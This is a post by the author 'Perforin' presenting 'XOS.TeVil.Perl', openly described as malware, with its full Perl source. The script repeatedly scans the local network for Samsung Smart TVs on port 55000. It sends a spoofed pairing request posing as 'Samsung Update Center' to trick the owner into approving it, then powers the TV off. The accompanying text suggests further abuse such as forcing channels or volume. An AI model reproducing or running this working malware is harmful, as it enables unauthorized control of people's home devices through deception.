[+]Topic: Code
[+]By: Perforin
[+]Return: Code
XOS.TeVil.Perl is a malware that scans the network for connected
Samsung TV's with Smart TV. Every connected TV with this feature let's
you control it remotely. If it finds a target, it sends its auth request
to the TV. I searched for a method which would bypass this request but
could not find anything. The TV wants to save your MAC adress but that
is not 100% correct. You can send any string to the TV which will be
taken as a password. I tried to use the TV's MAC adress, empty Strings,
Strings with a Joker sign, Nullbytes, the TV's manufacturer name, the
broadcast adress... unfortunately this still requires user interaction.
That's why we have to use some social engineering. The malware tells the
User that the request comes from "Samsung Update Center".
After the user authorizes our script it will simply shutdown the TV. Of
course you could do some other things like switching channels... maybe
to some porn? Or mute the TV. Rise the volume to maximum. If you are
interested you should check this: DeviceAPI Guide for Samsung Smart TV
--> Download <--
<![CDATA[
#!/usr/bin/env perl
=pod
XOS.TeVil.Perl.Perforin-vxnetw0rk
XOS.TeVil.Perl is a malware that scans the network for connected
Samsung TV's with Smart TV. Every connected TV with this feature let's
you control it remotely. If it finds a target, it sends its auth request
to the TV. I searched for a method which would bypass this request but
could not find anything. The TV wants to save your MAC adress but that
is not 100% correct. You can send any string to the TV which will be
taken as a password. I tried to use the TV's MAC adress, empty Strings,
Strings with a Joker sign, Nullbytes, the TV's manufacturer name the
broadcast adress... unfortunately this still requires user interaction.
That's why we have to use some social engineering. The malware tells the
User that the request comes from "Samsung Update Center".
After the user authorizes our script it will simply shutdown the TV.
coded by Perforin [vxnetw0rk]
=cut
use IO::Socket;
use MIME::Base64;
#### local ip adress routine ###########################################
my $sock = new IO::Socket::INET (
PeerAddr => "173.194.67.138",
PeerPort => 80,
Proto => 'tcp'
);
my $localip = $sock->sockhost;
close $sock;
########################################################################
#print "Local IP: " . $localip; # DEBUG
$range = $localip =~ /(\d+\.\d+\.\d+\.)(\d+)/;
$to_scan = $1;
#print "\nScanning range: " . $to_scan . "\n"; # DEBUG
while (1) {
scan_network();
sleep 300; # Scan every 5 minutes
}
#### Scanning local network ############################################
sub scan_network {
for (0..255) {
my $sock = new IO::Socket::INET (
PeerAddr => $to_scan . $_,
PeerPort => 55000,
Proto => 'tcp',
Timeout => 0.5
);
#print "Scanning " . $to_scan . $_ . "\n"; # DEBUG
if ($sock) {
#print $to_scan . $_ . " is a Samsung TV!\n"; # DEBUG
$to_pwn = $to_scan . $_;
pwn_it($to_pwn);
}
close($sock);
}
}
########################################################################
#### pwning routine ####################################################
sub pwn_it {
$ip = shift;
#print "Pwning $ip !\n"; # DEBUG
my $sock = new IO::Socket::INET (
PeerAddr => $ip,
PeerPort => 55000,
Proto => 'tcp',
);
my $mymac = "FF-FF-FF-FF-FF-FF"; # Is not checking MAC format. Could be any string and the TV wouldn't mind :)
my $appstring = "iphone..iapp.samsung"; # Some spoofing going on here
my $tvappstring = "iphone.BringVXheavensBack.iapp.samsung";
my $remotename = "Samsung Update Center";
my $msg1 = chr(0x64) . chr(0x00) . chr(length(encode_base64($localip))) . chr(0x00) . encode_base64($localip) . chr(length(encode_base64($mymac))) . chr(0x00) . encode_base64($mymac) . chr(length(encode_base64($remotename))) . chr(0x00) . encode_base64($remotename);
my $part1 = chr(0x00) . chr(length($appstring)) . chr(0x00) . $appstring . chr(length($msg1)) . chr(0x00) . $msg1;
print $sock $part1;
my $msg2 = chr(0xc8) . chr(0x00);
my $part2 = chr(0x00) . chr(length($appstring)) . chr(0x00) . $appstring . chr(length($msg2)) . chr(0x00) . $msg2;
print $sock $part2;
my $key = "KEY_" . "POWEROFF";
my $msg3 = chr(0x00) . chr(0x00) . chr(0x00) . chr(length(encode_base64($key))) . chr(0x00) . encode_base64($key);
my $part3 = chr(0x00) . chr(length($tvappstring)) . chr(0x00) . $tvappstring . chr(length($msg3)) . chr(0x00) . $msg3;
print $sock $part3;
}
########################################################################
]]>